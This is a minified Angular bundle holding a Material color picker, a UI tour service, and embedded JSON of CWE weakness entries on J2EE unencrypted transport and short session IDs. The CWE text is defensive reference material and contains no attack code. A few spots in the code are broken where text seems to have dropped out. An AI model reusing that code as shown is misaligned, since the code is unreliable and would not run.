.ngx-mat-color-palette{width:80vw;height:100vw}}\n"],encapsulation:2,data:{animation:[NV.transformPanel,NV.fadeInCalendar]},changeDetection:0}),t})(),rxe=(()=>{class t{constructor(e,i,n,r,c,d,T,k){this._dialog=e,this._overlay=i,this._zone=n,this._adapter=r,this._dir=c,this._document=T,this._viewContainerRef=k,this.openedStream=new Tt,this.closedStream=new Tt,this._touchUi=!1,this._opened=!1,this._defaultColor="primary",this._validSelected=null,this._disabledChange=new J,this._focusedElementBeforeOpen=null,this._inputSubscription=I.EMPTY,this._selectedChanged=new J,this._scrollStrategy=d}get disabled(){return void 0===this._disabled&&this._pickerInput?this._pickerInput.disabled:!!this._disabled}set disabled(e){const i=wi(e);i!==this._disabled&&(this._disabled=i,this._disabledChange.next(i))}get touchUi(){return this._touchUi}set touchUi(e){this._touchUi=wi(e)}get opened(){return this._opened}set opened(e){e?this.open():this.close()}get defaultColor(){return this._defaultColor}set defaultColor(e){this._defaultColor=e}get color(){return this._color||(this._pickerInput?this._pickerInput.getThemePalette():void 0)}set color(e){this._color=e}get _selected(){return this._validSelected}set _selected(e){this._validSelected=e}ngOnInit(){}ngOnDestroy(){this.close(),this._inputSubscription.unsubscribe(),this._disabledChange.complete(),this._popupRef&&(this._popupRef.dispose(),this._popupComponentRef=null)}select(e){let i=this._selected;this._selected=e,this._adapter.sameColor(i,this._selected)||this._selectedChanged.next(e)}registerInput(e){if(this._pickerInput)throw Error("A ColorPicker can only be associated with a single input.");this._pickerInput=e,this._inputSubscription=this._pickerInput._valueChange.subscribe(i=>this._selected=i)}open(){if(!this._opened&&!this.disabled){if(!this._pickerInput)throw Error("Attempted to open an ColorPicker with no associated input.");this._document&&(this._focusedElementBeforeOpen=this._document.activeElement),this.touchUi?this._openAsDialog():this._openAsPopup(),this._opened=!0,this.openedStream.emit()}}_openAsDialog(){this._dialogRef&&this._dialogRef.close(),this._dialogRef=this._dialog.open(Fq,{direction:this._dir?this._dir.value:"ltr",viewContainerRef:this._viewContainerRef,panelClass:"ngx-mat-colorpicker-dialog"}),this._dialogRef.afterClosed().subscribe(()=>this.close()),this._dialogRef.componentInstance.picker=this,this._setColor()}_openAsPopup(){this._portal||(this._portal=new hp(Fq,this._viewContainerRef)),this._popupRef||this._createPopup(),this._popupRef.hasAttached()||(this._popupComponentRef=this._popupRef.attach(this._portal),this._popupComponentRef.instance.picker=this,this._setColor(),this._zone.onStable.asObservable().pipe(Cn(1)).subscribe(()=>{this._popupRef.updatePosition()}))}_createPopup(){const e=new yg({positionStrategy:this._createPopupPositionStrategy(),hasBackdrop:!0,backdropClass:"mat-overlay-transparent-backdrop",direction:this._dir,scrollStrategy:this._scrollStrategy(),panelClass:"mat-colorpicker-popup"});this._popupRef=this._overlay.create(e),this._popupRef.overlayElement.setAttribute("role","dialog"),ra(this._popupRef.backdropClick(),this._popupRef.detachments(),this._popupRef.keydownEvents().pipe(Dn(i=>27===i.keyCode||this._pickerInput&&i.altKey&&38===i.keyCode))).subscribe(i=>{i&&i.preventDefault(),this.close()})}close(){if(!this._opened)return;this._popupRef&&this._popupRef.hasAttached()&&this._popupRef.detach(),this._dialogRef&&(this._dialogRef.close(),this._dialogRef=null),this._portal&&this._portal.isAttached&&this._portal.detach();const e=()=>{this._opened&&(this._opened=!1,this.closedStream.emit(),this._focusedElementBeforeOpen=null)};this._focusedElementBeforeOpen&&"function"==typeof this._focusedElementBeforeOpen.focus?(this._focusedElementBeforeOpen.focus(),setTimeout(e)):e()}_setColor(){const e=this.color;this._popupComponentRef&&(this._popupComponentRef.instance.color=e),this._dialogRef&&(this._dialogRef.componentInstance.color=e)}_createPopupPositionStrategy(){return this._overlay.position().flexibleConnectedTo(this._pickerInput.getConnectedOverlayOrigin()).withTransformOriginOn(".ngx-mat-colorpicker-content").withFlexibleDimensions(!1).withViewportMargin(8).withLockedPosition().withPositions([{originX:"start",originY:"bottom",overlayX:"start",overlayY:"top"},{originX:"start",originY:"top",overlayX:"start",overlayY:"bottom"},{originX:"end",originY:"bottom",overlayX:"end",overlayY:"top"},{originX:"end",originY:"top",overlayX:"end",overlayY:"bottom"}])}}return t.\u0275fac=function(e){return new(e||t)(Ee(vu),Ee(As),Ee(qi),Ee(t5),Ee(Cr,8),Ee(Wq),Ee(ga,8),Ee(fo))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-picker"]],inputs:{disabled:"disabled",touchUi:"touchUi",opened:"opened",defaultColor:"defaultColor",color:"color"},outputs:{openedStream:"opened",closedStream:"closed"},exportAs:["ngxMatColorPicker"],decls:0,vars:0,template:function(e,i){},encapsulation:2,changeDetection:0}),t})();class lT{constructor(a,e){this.target=a,this.targetElement=e,this.value=this.target.value}}const sxe={provide:Ls,useExisting:ja(()=>a5),multi:!0},cxe={provide:ys,useExisting:ja(()=>a5),multi:!0};let a5=(()=>{class t{constructor(e,i,n,r){if(this._elementRef=e,this._formField=i,this._colorFormats=n,this._adapter=r,this.colorChange=new Tt,this.colorInput=new Tt,this._disabledChange=new Tt,this._valueChange=new Tt,this._onTouched=()=>{},this._cvaOnChange=()=>{},this._validatorOnChange=()=>{},this._pickerSubscription=I.EMPTY,this._validator=Td.compose([]),this._lastValueValid=!1,!this._colorFormats)throw function X6e(t){return Error(`NgxMatColorPicker: No provider found for ${t}. You must define MAT_COLOR_FORMATS in your module`)}("MAT_COLOR_FORMATS")}set ngxMatColorPicker(e){!e||(this._picker=e,this._picker.registerInput(this),this._pickerSubscription.unsubscribe(),this._pickerSubscription=this._picker._selectedChanged.subscribe(i=>{this.value=i,this._cvaOnChange(i),this._onTouched(),this.colorInput.emit(new lT(this,this._elementRef.nativeElement)),this.colorChange.emit(new lT(this,this._elementRef.nativeElement))}))}get disabled(){return!!this._disabled}set disabled(e){const i=wi(e),n=this._elementRef.nativeElement;this._disabled!==i&&(this._disabled=i,this._disabledChange.emit(i)),i&&n.blur&&n.blur()}get value(){return this._value}set value(e){const i=this.value;this._value=e,this._formatValue(e),this._adapter.sameColor(i,e)||this._valueChange.emit(e)}getThemePalette(){return this._formField?this._formField.color:void 0}registerOnValidatorChange(e){this._validatorOnChange=e}validate(e){return this._validator?this._validator(e):null}getPopupConnectionElementRef(){return this.getConnectedOverlayOrigin()}getConnectedOverlayOrigin(){return this._formField?this._formField.getConnectedOverlayOrigin():this._elementRef}ngOnInit(){}ngOnDestroy(){this._pickerSubscription.unsubscribe(),this._valueChange.complete(),this._disabledChange.complete()}writeValue(e){this.value=e}registerOnChange(e){this._cvaOnChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e}_onChange(){this.colorChange.emit(new lT(this,this._elementRef.nativeElement))}_onKeydown(e){this._picker&&e.altKey&&40===e.keyCode&&!this._elementRef.nativeElement.readOnly&&(this._picker.open(),e.preventDefault())}_onBlur(){this.value&&this._formatValue(this.value),this._onTouched()}_formatValue(e){this._elementRef.nativeElement.value=e?this._adapter.format(e,this._colorFormats.display.colorInput):""}_onInput(e){const i=this._lastValueValid,n=this._adapter.parse(e);this._adapter.sameColor(n,this._value)?i!==this._lastValueValid&&this._validatorOnChange():(this._value=n,this._cvaOnChange(n),this._valueChange.emit(n),this.colorInput.emit(new lT(this,this._elementRef.nativeElement)))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(nn,8),Ee(zq,8),Ee(t5))},t.\u0275dir=Ot({type:t,selectors:[["input","ngxMatColorPicker",""]],hostVars:3,hostBindings:function(e,i){1&e&&he("input",function(r){return i._onInput(r.target.value)})("change",function(){return i._onChange()})("blur",function(){return i._onBlur()})("keydown",function(r){return i._onKeydown(r)}),2&e&&(Gs("disabled",i.disabled),Rt("aria-haspopup",i._picker?"dialog":null)("aria-owns",(null==i._picker?null:i._picker.opened)&&i._picker.id||null))},inputs:{ngxMatColorPicker:"ngxMatColorPicker",disabled:"disabled",value:"value"},outputs:{colorChange:"colorChange",colorInput:"colorInput"},exportAs:["ngxMatColorPickerInput"],features:[ki([sxe,cxe,{provide:c8,useExisting:t}])]}),t})(),Vq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[t5,nxe],imports:[rn,l8,up,aA,_8,z4,ux,y8,yu,ib]}),t})();const dxe=["*"];var Pp=(()=>{return(t=Pp||(Pp={}))[t.Top=0]="Top",t[t.Bottom=1]="Bottom",t[t.All=2]="All",Pp;var t})();function Bq(t,a=Pp.All){const e=window.innerWidth,i=window.innerHeight,n=t.getBoundingClientRect(),r=n.left>=0&&n.right<=e,c=n.top>=0,d=n.bottom<=i;return a===Pp.Top?c&&r:a===Pp.Bottom?d&&r:c&&d&&r}class Hq{static ensureVisible(a){Bq(a,Pp.Bottom)?Bq(a,Pp.Top)||a.scrollIntoView(!0):a.scrollIntoView(!1)}}let n5=(()=>{class t{constructor(e){this.renderer=e.createRenderer(null,null)}show(e,i=!0){this.isScrollingEnabled=i,this.targetHtmlElement=e.nativeElement,this.backdropElements||(this.backdropElements=this.createBackdropElements(),this.subscribeToWindowResizeEvent()),this.setBackdropPosition()}setBackdropPosition(){const e=this.targetHtmlElement.getBoundingClientRect(),i=document.documentElement,n=i.scrollHeight,c=window.scrollX,d=window.scrollY,te=[{width:e.left+c,height:n,top:0,left:0},{width:e.width,height:e.top+d,top:0,left:e.left+c},{width:e.width,height:n-(e.bottom+d),top:e.bottom+d,left:e.left+c},{width:i.scrollWidth-(e.right+c),height:n,top:0,left:e.right+c}];for(let pe=0;pe{let i=!1,n=null,r=null;const c=()=>{if(null==r||r.unsubscribe(),r=null,i){i=!1;const d=n;n=null,e.next(d)}};a.subscribe(Ae(e,d=>{null==r||r.unsubscribe(),i=!0,n=d,r=Ae(e,c,y),pn(t(d)).subscribe(r)},()=>{c(),e.complete()},void 0,()=>{n=r=null}))})}(()=>$z(10))).subscribe(()=>{this.setBackdropPosition(),Hq.ensureVisible(this.targetHtmlElement)})}close(){this.backdropElements&&(this.removeBackdropElement(),this.windowResizeSubscription$.unsubscribe())}removeBackdropElement(){this.backdropElements.forEach(e=>this.renderer.removeChild(document.body,e)),this.backdropElements=void 0}applyStyles(e,i){for(const n of Object.keys(e))this.renderer.setStyle(i,n,e[n])}createBackdropStyles(e){return{position:this.isScrollingEnabled?"absolute":"fixed",width:`${e.width}px`,height:`${e.height}px`,top:`${e.top}px`,left:`${e.left}px`,backgroundColor:"rgba(0, 0, 0, 0.7)",zIndex:"101"}}createBackdropElement(){const e=this.renderer.createElement("div");return this.renderer.addClass(e,"ngx-ui-tour_backdrop"),this.renderer.appendChild(document.body,e),e}createBackdropElements(){return Array.from({length:4}).map(()=>this.createBackdropElement())}}return t.\u0275fac=function(e){return new(e||t)(At(qs))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();var Yl=(()=>{return(t=Yl||(Yl={}))[t.OFF=0]="OFF",t[t.ON=1]="ON",t[t.PAUSED=2]="PAUSED",Yl;var t})(),zg=(()=>{return(t=zg||(zg={}))[t.Forwards=0]="Forwards",t[t.Backwards=1]="Backwards",zg;var t})();const mxe={disableScrollToAnchor:!1,prevBtnTitle:"Prev",nextBtnTitle:"Next",endBtnTitle:"End",enableBackdrop:!1,isAsync:!1,isOptional:!1,delayAfterNavigation:0,nextOnAnchorClick:!1};let dT=(()=>{class t{constructor(e,i,n){this.router=e,this.rendererFactory=i,this.backdrop=n,this.stepShow$=new J,this.stepHide$=new J,this.initialize$=new J,this.start$=new J,this.end$=new J,this.pause$=new J,this.resume$=new J,this.anchorRegister$=new J,this.anchorUnregister$=new J,this.events$=ra(this.stepShow$.pipe(Xe(r=>({name:"stepShow",value:r}))),this.stepHide$.pipe(Xe(r=>({name:"stepHide",value:r}))),this.initialize$.pipe(Xe(r=>({name:"initialize",value:r}))),this.start$.pipe(Xe(r=>({name:"start",value:r}))),this.end$.pipe(Xe(r=>({name:"end",value:r}))),this.pause$.pipe(Xe(r=>({name:"pause",value:r}))),this.resume$.pipe(Xe(r=>({name:"resume",value:r}))),this.anchorRegister$.pipe(Xe(r=>({name:"anchorRegister",value:r}))),this.anchorUnregister$.pipe(Xe(r=>({name:"anchorUnregister",value:r})))),this.steps=[],this.anchors={},this.status=Yl.OFF,this.isHotKeysEnabled=!0,this.direction=zg.Forwards,this.renderer=i.createRenderer(null,null)}initialize(e,i){e&&e.length>0&&(this.status=Yl.OFF,this.steps=e.map(n=>Object.assign(Object.assign(Object.assign({},mxe),i),n)),this.initialize$.next(this.steps))}disableHotkeys(){this.isHotKeysEnabled=!1}enableHotkeys(){this.isHotKeysEnabled=!0}start(){this.startAt(0)}startAt(e){this.status=Yl.ON,this.goToStep(this.loadStep(e)),this.start$.next(),this.router.events.pipe(Dn(i=>i instanceof Ey),xd()).subscribe(()=>{this.currentStep&&this.currentStep.hasOwnProperty("route")&&this.hideStep(this.currentStep)})}end(){this.status=Yl.OFF,this.hideStep(this.currentStep),this.currentStep=void 0,this.removeLastAnchorClickListener(),this.backdrop.close(),this.end$.next()}pause(){this.status=Yl.PAUSED,this.hideStep(this.currentStep),this.pause$.next()}resume(){this.status=Yl.ON,this.showStep(this.currentStep),this.resume$.next()}toggle(e){e?this.currentStep?this.pause():this.resume():this.currentStep?this.end():this.start()}next(){this.direction=zg.Forwards,this.hasNext(this.currentStep)&&this.goToStep(this.loadStep(this.currentStep.nextStep||this.steps.indexOf(this.currentStep)+1))}hasNext(e){return e?void 0!==e.nextStep||this.steps.indexOf(e)0&&!this.isPrevOptionalAnchorMising(e):(console.warn("Can't get previous step. No currentStep."),!1)}isPrevOptionalAnchorMising(e){for(let n=this.steps.indexOf(e)-1;n>-1;n--){const r=this.steps[n];if(!r.isOptional||this.anchors[r.anchorId])return!1}return!0}goto(e){this.goToStep(this.loadStep(e))}register(e,i){if(e){if(this.anchors[e])throw new Error("anchorId "+e+" already registered!");this.anchors[e]=i,this.anchorRegister$.next(e)}}unregister(e){!e||(delete this.anchors[e],this.anchorUnregister$.next(e))}getStatus(){return this.status}isHotkeysEnabled(){return this.isHotKeysEnabled}goToStep(e){if(!e)return console.warn("Can't go to non-existent step"),void this.end();this.currentStep&&this.hideStep(this.currentStep),this.removeLastAnchorClickListener(),null!=e.route?this.navigateToRouteAndSetStep(e):this.setCurrentStepAsync(e)}removeLastAnchorClickListener(){this.unListenNextOnAnchorClickFn&&(this.unListenNextOnAnchorClickFn(),this.unListenNextOnAnchorClickFn=void 0)}listenToOnAnchorClick(e){e.nextOnAnchorClick&&(this.unListenNextOnAnchorClickFn=this.renderer.listen(this.anchors[e.anchorId].element.nativeElement,"click",()=>this.next()))}navigateToRouteAndSetStep(e){return ht(this,void 0,void 0,function*(){const i="string"==typeof e.route?e.route:this.router.createUrlTree(e.route);this.router.isActive(i,{paths:"exact",matrixParams:"exact",queryParams:"subset",fragment:"ignored"})?this.setCurrentStepAsync(e):(yield this.router.navigateByUrl(i))?this.setCurrentStepAsync(e,e.delayAfterNavigation):(console.warn("Navigation to route failed: ",e.route),this.end())})}loadStep(e){return"number"==typeof e?this.steps[e]:this.steps.find(i=>i.stepId===e)}setCurrentStep(e){this.currentStep=e,this.showStep(this.currentStep),this.router.events.pipe(Dn(i=>i instanceof Ey),xd()).subscribe(()=>{this.currentStep&&this.currentStep.hasOwnProperty("route")&&this.hideStep(this.currentStep)})}setCurrentStepAsync(e,i=0){setTimeout(()=>this.setCurrentStep(e),i)}showStep(e){const i=this.anchors[e&&e.anchorId];if(!i)return e.isAsync?void this.anchorRegister$.pipe(Dn(n=>n===e.anchorId),xd(),Z3(0)).subscribe(()=>this.showStep(e)):e.isOptional?void(this.direction===zg.Forwards?this.next():this.prev()):(console.warn("Can't attach to unregistered anchor with id "+e.anchorId),void this.end());this.listenToOnAnchorClick(e),this.scrollToAnchor(e),i.showTourStep(e),this.toggleBackdrop(e),this.stepShow$.next(e)}hideStep(e){const i=this.anchors[e&&e.anchorId];!i||(i.hideTourStep(),this.stepHide$.next(e))}scrollToAnchor(e){e.disableScrollToAnchor||Hq.ensureVisible(this.anchors[null==e?void 0:e.anchorId].element.nativeElement)}toggleBackdrop(e){var i,n;const r=this.anchors[null==e?void 0:e.anchorId],c=null===(n=null===(i=r.getIsScrollingEnabled)||void 0===i?void 0:i.call(r))||void 0===n||n;e.enableBackdrop?this.backdrop.show(r.element,c):this.backdrop.close()}}return t.\u0275fac=function(e){return new(e||t)(At(Oo),At(qs),At(n5))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),uxe=(()=>{class t{constructor(e){this.tourService=e}onEscapeKey(){this.tourService.getStatus()===Yl.ON&&this.tourService.isHotkeysEnabled()&&this.tourService.end()}onArrowRightKey(){const e=this.tourService.currentStep;this.tourService.getStatus()===Yl.ON&&this.tourService.hasNext(this.tourService.currentStep)&&this.tourService.isHotkeysEnabled()&&(null==e||!e.nextOnAnchorClick)&&this.tourService.next()}onArrowLeftKey(){this.tourService.getStatus()===Yl.ON&&this.tourService.hasPrev(this.tourService.currentStep)&&this.tourService.isHotkeysEnabled()&&this.tourService.prev()}}return t.\u0275fac=function(e){return new(e||t)(Ee(dT))},t.\u0275cmp=Wt({type:t,selectors:[["tour-hotkey-listener"]],hostBindings:function(e,i){1&e&&he("keydown.Escape",function(){return i.onEscapeKey()},0,zC)("keydown.ArrowRight",function(){return i.onArrowRightKey()},!1,zC)("keydown.ArrowLeft",function(){return i.onArrowLeftKey()},!1,zC)},ngContentSelectors:dxe,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},encapsulation:2}),t})(),Uq=(()=>{class t{static forRoot(){return{ngModule:t,providers:[dT,n5]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms]}),t})();function hxe(t,a){1&t&&Ir(0)}function fxe(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(){return be(e),Me(V(2).tourService.next())}),s(1),m(2,"mat-icon"),s(3,"chevron_right"),u()()}if(2&t){const e=V().step;g(1),ct(" ",null==e?null:e.nextBtnTitle," ")}}function pxe(t,a){if(1&t){const e=Ye();m(0,"button",12),he("click",function(){return be(e),Me(V(2).tourService.end())}),s(1),u()}if(2&t){const e=V().step;g(1),ct(" ",null==e?null:e.endBtnTitle," ")}}function _xe(t,a){if(1&t){const e=Ye();m(0,"mat-card",3),he("click",function(n){return n.stopPropagation()}),m(1,"mat-card-title")(2,"div",4),s(3),u(),m(4,"button",5),he("click",function(){return be(e),Me(V().tourService.end())}),m(5,"mat-icon"),s(6,"close"),u()()(),it(7,"mat-card-content",6),m(8,"mat-card-actions",7)(9,"button",8),he("click",function(){return be(e),Me(V().tourService.prev())}),m(10,"mat-icon"),s(11,"chevron_left"),u(),s(12),u(),ne(13,fxe,4,1,"button",9),ne(14,pxe,2,1,"button",10),u()()}if(2&t){const e=a.step,i=V();g(3),ke(null==e?null:e.title),g(4),F("innerHTML",null==e?null:e.content,Uc),g(2),F("disabled",!i.tourService.hasPrev(e)),g(3),ct(" ",null==e?null:e.prevBtnTitle," "),g(1),F("ngIf",i.tourService.hasNext(e)&&!e.nextOnAnchorClick),g(1),F("ngIf",!i.tourService.hasNext(e))}}const gxe=function(t){return{step:t}};let Gb=(()=>{class t extends dT{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function Cxe(t,a){return()=>{const i=t.scrollStrategies;return a.currentStep.disablePageScrolling?i.block():i.reposition()}}let yxe=(()=>{class t{constructor(e){this.changeDetector=e}markForCheck(){this.changeDetector.markForCheck()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["tour-anchor-opener"]],viewQuery:function(e,i){if(1&e&&Mi(po,7),2&e){let n;Vt(n=Bt())&&(i.trigger=n.first)}},features:[ki([{provide:n8,useFactory:Cxe,deps:[As,Gb]}])],decls:1,vars:1,consts:[["matMenuTriggerFor","",3,"matMenuTriggerRestoreFocus"]],template:function(e,i){1&e&&it(0,"span",0),2&e&&F("matMenuTriggerRestoreFocus",!1)},dependencies:[po],styles:["[_nghost-%COMP%]{display:none}"]}),t})(),o5=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),qq=(()=>{class t{constructor(e,i,n,r,c){this.injector=e,this.viewContainer=i,this.element=n,this.tourService=r,this.tourStepTemplate=c}ngOnInit(){this.tourService.register(this.tourAnchor,this)}ngOnDestroy(){this.tourService.unregister(this.tourAnchor)}createOpener(){this.opener=this.viewContainer.createComponent(yxe).instance}showTourStep(e){var i,n;this.isActive=!0,this.tourStepTemplate.templateComponent.step=e,this.opener||this.createOpener();const r=this.opener.trigger;r._element=this.element;const c=this.tourStepTemplate.templateComponent.tourStep;r.menu=c,c.xPosition=(null===(i=e.placement)||void 0===i?void 0:i.xPosition)||"after",c.yPosition=(null===(n=e.placement)||void 0===n?void 0:n.yPosition)||"below",c.hasBackdrop=!!e.closeOnOutsideClick,this.opener.markForCheck(),r.openMenu(),this.menuCloseSubscription&&this.menuCloseSubscription.unsubscribe(),this.menuCloseSubscription=r.menuClosed.pipe(xd()).subscribe(()=>{this.tourService.getStatus()!==Yl.OFF&&this.tourService.end()})}hideTourStep(){this.isActive=!1,this.menuCloseSubscription&&this.menuCloseSubscription.unsubscribe(),this.opener.trigger.closeMenu()}getIsScrollingEnabled(){return!this.tourService.currentStep.disablePageScrolling}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ko),Ee(fo),Ee(mi),Ee(Gb),Ee(o5))},t.\u0275dir=Ot({type:t,selectors:[["","tourAnchor",""]],hostVars:2,hostBindings:function(e,i){2&e&&Ct("touranchor--is-active",i.isActive)},inputs:{tourAnchor:"tourAnchor"}}),t})(),bxe=(()=>{class t extends uxe{constructor(e,i){super(i),this.tourStepTemplateService=e,this.tourService=i,this.step={}}ngAfterViewInit(){this.tourStepTemplateService.templateComponent=this}}return t.\u0275fac=function(e){return new(e||t)(Ee(o5),Ee(Gb))},t.\u0275cmp=Wt({type:t,selectors:[["tour-step-template"]],contentQueries:function(e,i,n){if(1&e&&fa(n,ho,5),2&e){let r;Vt(r=Bt())&&(i.stepTemplateContent=r.first)}},viewQuery:function(e,i){if(1&e&&Mi(Xo,5),2&e){let n;Vt(n=Bt())&&(i.tourStep=n.first)}},inputs:{stepTemplate:"stepTemplate"},features:[ci],decls:4,vars:5,consts:[[1,"tour-step",3,"overlapTrigger"],[4,"ngTemplateOutlet","ngTemplateOutletContext"],["defaultTemplate",""],[3,"click"],[1,"title-text"],["mat-button","","mat-icon-button","",1,"close",3,"click"],[3,"innerHTML"],["align","end"],["mat-button","",1,"prev",3,"disabled","click"],["mat-button","","class","next",3,"click",4,"ngIf"],["mat-button","",3,"click",4,"ngIf"],["mat-button","",1,"next",3,"click"],["mat-button","",3,"click"]],template:function(e,i){if(1&e&&(m(0,"mat-menu",0),ne(1,hxe,1,0,"ng-container",1),u(),ne(2,_xe,15,6,"ng-template",null,2,d1)),2&e){const n=Ti(3);F("overlapTrigger",!1),g(1),F("ngTemplateOutlet",i.stepTemplate||i.stepTemplateContent||n)("ngTemplateOutletContext",fr(3,gxe,i.step))}},dependencies:[Ri,_1,Xo,qF,HF,UF,$0e,da,oa],styles:[".tour-step .mat-menu-content{padding:0!important}mat-card[_ngcontent-%COMP%]{min-width:200px}mat-card-actions[_ngcontent-%COMP%]{justify-content:space-between}mat-card-actions[_ngcontent-%COMP%] button[_ngcontent-%COMP%]{margin:0}mat-card-actions[_ngcontent-%COMP%] button.prev[_ngcontent-%COMP%]{padding-left:4px}mat-card-actions[_ngcontent-%COMP%] button.next[_ngcontent-%COMP%]{padding-right:4px}mat-card-title[_ngcontent-%COMP%]{display:flex;align-items:center;justify-content:space-between}mat-card-title[_ngcontent-%COMP%] .title-text[_ngcontent-%COMP%]{line-height:24px;font-size:22px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}mat-card-title[_ngcontent-%COMP%] button.close[_ngcontent-%COMP%]{margin:-8px -8px -8px 0}"]}),t})(),Gq=(()=>{class t{static forRoot(){return{ngModule:t,providers:[o5,n5,dT,Gb]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Uq,o8,aA,up,ib,Uq]}),t})();const Op=JSON.parse('{"5":{"attr":{"@_ID":"5","@_Name":"J2EE Misconfiguration: Data Transmission Without Encryption","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Information sent over a network can be compromised while in transit. An attacker may be able to read or modify the contents if the data are sent in plaintext or are weakly encrypted.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"319","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data"},{"Scope":"Integrity","Impact":"Modify Application Data"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"The application configuration should ensure that SSL or an encryption mechanism of equivalent strength and vetted reputation is used for all access-controlled pages."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Insecure Transport"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"attr":{"@_Type":"Other"},"xhtml:p":"If an application uses SSL to guarantee confidential communication with client browsers, the application configuration should make it impossible to view any access controlled page without SSL. There are three common ways for SSL to be bypassed:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["A user manually enters URL and types \\"HTTP\\" rather than \\"HTTPS\\".","Attackers intentionally send a user to an insecure URL.","A programmer erroneously creates a relative link to a page in the application, which does not switch from HTTP to HTTPS. (This is particularly easy to do when the link moves between public and secured areas on a web site.)"]}}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Insecure Transport","attr":{"@_Date":"2008-04-11"}}}},"6":{"attr":{"@_ID":"6","@_Name":"J2EE Misconfiguration: Insufficient Session-ID Length","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The J2EE application is configured to use an insufficient session ID length.","Extended_Description":"If an attacker can guess or steal a session ID, then they may be able to take over the user\'s session (called session hijacking). The number of possible session IDs increases with increased session ID length, making it more difficult to guess or steal a session ID.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"334","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["Session ID\'s can be used to identify communicating parties in a web environment.","The expected number of seconds required to guess a valid session identifier is given by the equation: (2^B+1)/(2*A*S) Where: - B is the number of bits of entropy in the session identifier. - A is the number of guesses an attacker can try each second. - S is the number of valid session identifiers that are valid and available to be guessed at any given time. The number of bits of entropy in the session identifier is always less than the total number of bits in the session identifier. For example, if session identifiers were provided in ascending order, there would be close to zero bits of entropy in the session identifier no matter the identifier\'s length. Assuming that the session identifiers are being generated using a good source of random numbers, we will estimate the number of bits of entropy in a session identifier to be half the total number of bits in the session identifier. For realistic identifier lengths this is possible, though perhaps optimistic."]}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If an attacker can guess an authenticated user\'s session identifier, they can take over the user\'s session."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Session identifiers should be at least 128 bits long to prevent brute-force session guessing. A shorter session identifier leaves the application open to brute-force session guessing attacks."},{"Phase":"Implementation","Description":"A lower bound on the number of valid session identifiers that are available to be guessed is the number of users that are active on a site at any given moment. However, any users that abandon their sessions without logging out will increase this number. (This is one of many good reasons to have a short inactive session timeout.) With a 64 bit session identifier, assume 32 bits of entropy. For a large web 